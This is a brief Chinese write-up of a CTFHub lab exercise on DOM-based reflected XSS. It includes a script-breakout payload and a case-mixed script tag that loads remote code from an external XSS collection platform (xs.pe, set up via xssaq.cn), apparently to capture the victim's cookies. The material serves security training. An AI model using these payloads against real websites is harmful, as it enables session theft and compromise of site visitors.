根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
虫虫rankourin20 小时前
在 create-react-app (CRA) 创建的应用中使用 react-router-dom v7以及懒加载的使用方法小刘鸭地下城20 小时前
Web安全必备:关键 HTTP 标头解析yddddddy20 小时前
html基本知识荣达21 小时前
koa洋葱模型理解reembarkation21 小时前
使用pdfjs-dist 预览pdf,并添加文本层的实现KenXu1 天前
F2C-PTD工具将需求快速转换为代码实践给月亮点灯|1 天前
Vue3基础知识-setup()、ref()和reactive()芜青1 天前
【Vue2手录12】单文件组件SFC冷冷的菜哥1 天前
react实现无缝轮播组件hrrrrb1 天前
【Python】字符串